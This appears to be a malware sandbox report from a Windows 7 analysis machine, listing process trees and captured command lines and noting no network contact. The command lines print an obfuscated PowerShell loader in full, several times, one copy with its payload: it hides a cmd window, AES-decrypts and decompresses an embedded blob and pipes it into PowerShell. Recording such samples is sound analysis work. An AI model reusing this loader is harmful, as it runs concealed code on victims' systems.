Category | Machine | Started | Completed |
---|---|---|---|
FILE | s1_win7_x6401 | May 28, 2023, 1:44 p.m. | May 28, 2023, 2:18 p.m. |
powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted Start-Process 'cmd.exe' -WindowStyle hidden -ArgumentList {/c powershell.exe $ITufmtMLHgVEL = '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';$XDMpCreVXQAD = 'b0trbUFVUE1PUkpvVVB5S0hHSVhXRkNpdHdxT2REbkg=';$bLWdYeFBFuhJS = New-Object 'System.Security.Cryptography.AesManaged';$bLWdYeFBFuhJS.Mode = [System.Security.Cryptography.CipherMode]::ECB;$bLWdYeFBFuhJS.Padding = [System.Security.Cryptography.PaddingMode]::Zeros;$bLWdYeFBFuhJS.BlockSize = 128;$bLWdYeFBFuhJS.KeySize = 256;$bLWdYeFBFuhJS.Key = [System.Convert]::FromBase64String($XDMpCreVXQAD);$WEAiH = [System.Convert]::FromBase64String($ITufmtMLHgVEL);$pyRnuLwCWDuo = $WEAiH[0..15];$bLWdYeFBFuhJS.IV = $pyRnuLwCWDuo;$hBIElkDucKiphjB = $bLWdYeFBFuhJS.CreateDecryptor();$PCFcWCWNsM = $hBIElkDucKiphjB.TransformFinalBlock($WEAiH, 16, $WEAiH.Length - 16);$bLWdYeFBFuhJS.Dispose();$xUKePqe = New-Object System.IO.MemoryStream( , $PCFcWCWNsM );$QcFLJ = New-Object System.IO.MemoryStream;$idFDAFHbprcw = New-Object System.IO.Compression.GzipStream $xUKePqe, ([IO.Compression.CompressionMode]::Decompress);$idFDAFHbprcw.CopyTo( $QcFLJ );$idFDAFHbprcw.Close();$xUKePqe.Close();[byte[]] $hzQbYlK = $QcFLJ.ToArray();$oPsDGyrbFbNs = [System.Text.Encoding]::UTF8.GetString($hzQbYlK);$oPsDGyrbFbNs | powershell - }
2648-
cmd.exe "C:\Windows\system32\cmd.exe" /c powershell.exe $ITufmtMLHgVEL = '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';$XDMpCreVXQAD = 'b0trbUFVUE1PUkpvVVB5S0hHSVhXRkNpdHdxT2REbkg=';$bLWdYeFBFuhJS = New-Object 'System.Security.Cryptography.AesManaged';$bLWdYeFBFuhJS.Mode = [System.Security.Cryptography.CipherMode]::ECB;$bLWdYeFBFuhJS.Padding = [System.Security.Cryptography.PaddingMode]::Zeros;$bLWdYeFBFuhJS.BlockSize = 128;$bLWdYeFBFuhJS.KeySize = 256;$bLWdYeFBFuhJS.Key = [System.Convert]::FromBase64String($XDMpCreVXQAD);$WEAiH = [System.Convert]::FromBase64String($ITufmtMLHgVEL);$pyRnuLwCWDuo = $WEAiH[0..15];$bLWdYeFBFuhJS.IV = $pyRnuLwCWDuo;$hBIElkDucKiphjB = $bLWdYeFBFuhJS.CreateDecryptor();$PCFcWCWNsM = $hBIElkDucKiphjB.TransformFinalBlock($WEAiH, 16, $WEAiH.Length - 16);$bLWdYeFBFuhJS.Dispose();$xUKePqe = New-Object System.IO.MemoryStream( , $PCFcWCWNsM );$QcFLJ = New-Object System.IO.MemoryStream;$idFDAFHbprcw = New-Object System.IO.Compression.GzipStream $xUKePqe, ([IO.Compression.CompressionMode]::Decompress);$idFDAFHbprcw.CopyTo( $QcFLJ );$idFDAFHbprcw.Close();$xUKePqe.Close();[byte[]] $hzQbYlK = $QcFLJ.ToArray();$oPsDGyrbFbNs = [System.Text.Encoding]::UTF8.GetString($hzQbYlK);$oPsDGyrbFbNs | powershell -
2784-
powershell.exe powershell.exe $ITufmtMLHgVEL = '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';$XDMpCreVXQAD = 'b0trbUFVUE1PUkpvVVB5S0hHSVhXRkNpdHdxT2REbkg=';$bLWdYeFBFuhJS = New-Object 'System.Security.Cryptography.AesManaged';$bLWdYeFBFuhJS.Mode = [System.Security.Cryptography.CipherMode]::ECB;$bLWdYeFBFuhJS.Padding = [System.Security.Cryptography.PaddingMode]::Zeros;$bLWdYeFBFuhJS.BlockSize = 128;$bLWdYeFBFuhJS.KeySize = 256;$bLWdYeFBFuhJS.Key = [System.Convert]::FromBase64String($XDMpCreVXQAD);$WEAiH = [System.Convert]::FromBase64String($ITufmtMLHgVEL);$pyRnuLwCWDuo = $WEAiH[0..15];$bLWdYeFBFuhJS.IV = $pyRnuLwCWDuo;$hBIElkDucKiphjB = $bLWdYeFBFuhJS.CreateDecryptor();$PCFcWCWNsM = $hBIElkDucKiphjB.TransformFinalBlock($WEAiH, 16, $WEAiH.Length - 16);$bLWdYeFBFuhJS.Dispose();$xUKePqe = New-Object System.IO.MemoryStream( , $PCFcWCWNsM );$QcFLJ = New-Object System.IO.MemoryStream;$idFDAFHbprcw = New-Object System.IO.Compression.GzipStream $xUKePqe, ([IO.Compression.CompressionMode]::Decompress);$idFDAFHbprcw.CopyTo( $QcFLJ );$idFDAFHbprcw.Close();$xUKePqe.Close();[byte[]] $hzQbYlK = $QcFLJ.ToArray();$oPsDGyrbFbNs = [System.Text.Encoding]::UTF8.GetString($hzQbYlK);$oPsDGyrbFbNs
2884 -
powershell.exe powershell -
2920
Name | Response | Post-Analysis Lookup |
---|---|---|
No hosts contacted. |
IP Address | Status | Action |
---|---|---|
No hosts contacted. |
Suricata Alerts
No Suricata Alerts
Suricata TLS
No Suricata TLS
file | C:\Users\test22\AppData\Local\Temp\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk |
cmdline | powershell.exe $ITufmtMLHgVEL = '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';$XDMpCreVXQAD = 'b0trbUFVUE1PUkpvVVB5S0hHSVhXRkNpdHdxT2REbkg=';$bLWdYeFBFuhJS = New-Object 'System.Security.Cryptography.AesManaged';$bLWdYeFBFuhJS.Mode = [System.Security.Cryptography.CipherMode]::ECB;$bLWdYeFBFuhJS.Padding = [System.Security.Cryptography.PaddingMode]::Zeros;$bLWdYeFBFuhJS.BlockSize = 128;$bLWdYeFBFuhJS.KeySize = 256;$bLWdYeFBFuhJS.Key = [System.Convert]::FromBase64String($XDMpCreVXQAD);$WEAiH = [System.Convert]::FromBase64String($ITufmtMLHgVEL);$pyRnuLwCWDuo = $WEAiH[0..15];$bLWdYeFBFuhJS.IV = $pyRnuLwCWDuo;$hBIElkDucKiphjB = $bLWdYeFBFuhJS.CreateDecryptor();$PCFcWCWNsM = $hBIElkDucKiphjB.TransformFinalBlock($WEAiH, 16, $WEAiH.Length - 16);$bLWdYeFBFuhJS.Dispose();$xUKePqe = New-Object System.IO.MemoryStream( , $PCFcWCWNsM );$QcFLJ = New-Object System.IO.MemoryStream;$idFDAFHbprcw = New-Object System.IO.Compression.GzipStream $xUKePqe, ([IO.Compression.CompressionMode]::Decompress);$idFDAFHbprcw.CopyTo( $QcFLJ );$idFDAFHbprcw.Close();$xUKePqe.Close();[byte[]] $hzQbYlK = $QcFLJ.ToArray();$oPsDGyrbFbNs = [System.Text.Encoding]::UTF8.GetString($hzQbYlK);$oPsDGyrbFbNs |
cmdline | "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted Start-Process 'cmd.exe' -WindowStyle hidden -ArgumentList {/c powershell.exe $ITufmtMLHgVEL = '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';$XDMpCreVXQAD = 'b0trbUFVUE1PUkpvVVB5S0hHSVhXRkNpdHdxT2REbkg=';$bLWdYeFBFuhJS = New-Object 'System.Security.Cryptography.AesManaged';$bLWdYeFBFuhJS.Mode = [System.Security.Cryptography.CipherMode]::ECB;$bLWdYeFBFuhJS.Padding = [System.Security.Cryptography.PaddingMode]::Zeros;$bLWdYeFBFuhJS.BlockSize = 128;$bLWdYeFBFuhJS.KeySize = 256;$bLWdYeFBFuhJS.Key = [System.Convert]::FromBase64String($XDMpCreVXQAD);$WEAiH = [System.Convert]::FromBase64String($ITufmtMLHgVEL);$pyRnuLwCWDuo = $WEAiH[0..15];$bLWdYeFBFuhJS.IV = $pyRnuLwCWDuo;$hBIElkDucKiphjB = $bLWdYeFBFuhJS.CreateDecryptor();$PCFcWCWNsM = $hBIElkDucKiphjB.TransformFinalBlock($WEAiH, 16, $WEAiH.Length - 16);$bLWdYeFBFuhJS.Dispose();$xUKePqe = New-Object System.IO.MemoryStream( , $PCFcWCWNsM );$QcFLJ = New-Object System.IO.MemoryStream;$idFDAFHbprcw = New-Object System.IO.Compression.GzipStream $xUKePqe, ([IO.Compression.CompressionMode]::Decompress);$idFDAFHbprcw.CopyTo( $QcFLJ );$idFDAFHbprcw.Close();$xUKePqe.Close();[byte[]] $hzQbYlK = $QcFLJ.ToArray();$oPsDGyrbFbNs = [System.Text.Encoding]::UTF8.GetString($hzQbYlK);$oPsDGyrbFbNs | powershell - } |
cmdline | powershell - |
cmdline | C:\Windows\System32\cmd.exe /c powershell.exe $ITufmtMLHgVEL = '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';$XDMpCreVXQAD = 'b0trbUFVUE1PUkpvVVB5S0hHSVhXRkNpdHdxT2REbkg=';$bLWdYeFBFuhJS = New-Object 'System.Security.Cryptography.AesManaged';$bLWdYeFBFuhJS.Mode = [System.Security.Cryptography.CipherMode]::ECB;$bLWdYeFBFuhJS.Padding = [System.Security.Cryptography.PaddingMode]::Zeros;$bLWdYeFBFuhJS.BlockSize = 128;$bLWdYeFBFuhJS.KeySize = 256;$bLWdYeFBFuhJS.Key = [System.Convert]::FromBase64String($XDMpCreVXQAD);$WEAiH = [System.Convert]::FromBase64String($ITufmtMLHgVEL);$pyRnuLwCWDuo = $WEAiH[0..15];$bLWdYeFBFuhJS.IV = $pyRnuLwCWDuo;$hBIElkDucKiphjB = $bLWdYeFBFuhJS.CreateDecryptor();$PCFcWCWNsM = $hBIElkDucKiphjB.TransformFinalBlock($WEAiH, 16, $WEAiH.Length - 16);$bLWdYeFBFuhJS.Dispose();$xUKePqe = New-Object System.IO.MemoryStream( , $PCFcWCWNsM );$QcFLJ = New-Object System.IO.MemoryStream;$idFDAFHbprcw = New-Object System.IO.Compression.GzipStream $xUKePqe, ([IO.Compression.CompressionMode]::Decompress);$idFDAFHbprcw.CopyTo( $QcFLJ );$idFDAFHbprcw.Close();$xUKePqe.Close();[byte[]] $hzQbYlK = $QcFLJ.ToArray();$oPsDGyrbFbNs = [System.Text.Encoding]::UTF8.GetString($hzQbYlK);$oPsDGyrbFbNs | powershell - |
cmdline | "C:\Windows\system32\cmd.exe" /c powershell.exe $ITufmtMLHgVEL = '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';$XDMpCreVXQAD = 'b0trbUFVUE1PUkpvVVB5S0hHSVhXRkNpdHdxT2REbkg=';$bLWdYeFBFuhJS = New-Object 'System.Security.Cryptography.AesManaged';$bLWdYeFBFuhJS.Mode = [System.Security.Cryptography.CipherMode]::ECB;$bLWdYeFBFuhJS.Padding = [System.Security.Cryptography.PaddingMode]::Zeros;$bLWdYeFBFuhJS.BlockSize = 128;$bLWdYeFBFuhJS.KeySize = 256;$bLWdYeFBFuhJS.Key = [System.Convert]::FromBase64String($XDMpCreVXQAD);$WEAiH = [System.Convert]::FromBase64String($ITufmtMLHgVEL);$pyRnuLwCWDuo = $WEAiH[0..15];$bLWdYeFBFuhJS.IV = $pyRnuLwCWDuo;$hBIElkDucKiphjB = $bLWdYeFBFuhJS.CreateDecryptor();$PCFcWCWNsM = $hBIElkDucKiphjB.TransformFinalBlock($WEAiH, 16, $WEAiH.Length - 16);$bLWdYeFBFuhJS.Dispose();$xUKePqe = New-Object System.IO.MemoryStream( , $PCFcWCWNsM );$QcFLJ = New-Object System.IO.MemoryStream;$idFDAFHbprcw = New-Object System.IO.Compression.GzipStream $xUKePqe, ([IO.Compression.CompressionMode]::Decompress);$idFDAFHbprcw.CopyTo( $QcFLJ );$idFDAFHbprcw.Close();$xUKePqe.Close();[byte[]] $hzQbYlK = $QcFLJ.ToArray();$oPsDGyrbFbNs = [System.Text.Encoding]::UTF8.GetString($hzQbYlK);$oPsDGyrbFbNs | powershell - |
cmdline | powershell.exe -ExecutionPolicy UnRestricted Start-Process 'cmd.exe' -WindowStyle hidden -ArgumentList {/c powershell.exe $ITufmtMLHgVEL = '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';$XDMpCreVXQAD = 'b0trbUFVUE1PUkpvVVB5S0hHSVhXRkNpdHdxT2REbkg=';$bLWdYeFBFuhJS = New-Object 'System.Security.Cryptography.AesManaged';$bLWdYeFBFuhJS.Mode = [System.Security.Cryptography.CipherMode]::ECB;$bLWdYeFBFuhJS.Padding = [System.Security.Cryptography.PaddingMode]::Zeros;$bLWdYeFBFuhJS.BlockSize = 128;$bLWdYeFBFuhJS.KeySize = 256;$bLWdYeFBFuhJS.Key = [System.Convert]::FromBase64String($XDMpCreVXQAD);$WEAiH = [System.Convert]::FromBase64String($ITufmtMLHgVEL);$pyRnuLwCWDuo = $WEAiH[0..15];$bLWdYeFBFuhJS.IV = $pyRnuLwCWDuo;$hBIElkDucKiphjB = $bLWdYeFBFuhJS.CreateDecryptor();$PCFcWCWNsM = $hBIElkDucKiphjB.TransformFinalBlock($WEAiH, 16, $WEAiH.Length - 16);$bLWdYeFBFuhJS.Dispose();$xUKePqe = New-Object System.IO.MemoryStream( , $PCFcWCWNsM );$QcFLJ = New-Object System.IO.MemoryStream;$idFDAFHbprcw = New-Object System.IO.Compression.GzipStream $xUKePqe, ([IO.Compression.CompressionMode]::Decompress);$idFDAFHbprcw.CopyTo( $QcFLJ );$idFDAFHbprcw.Close();$xUKePqe.Close();[byte[]] $hzQbYlK = $QcFLJ.ToArray();$oPsDGyrbFbNs = [System.Text.Encoding]::UTF8.GetString($hzQbYlK);$oPsDGyrbFbNs | powershell - } |
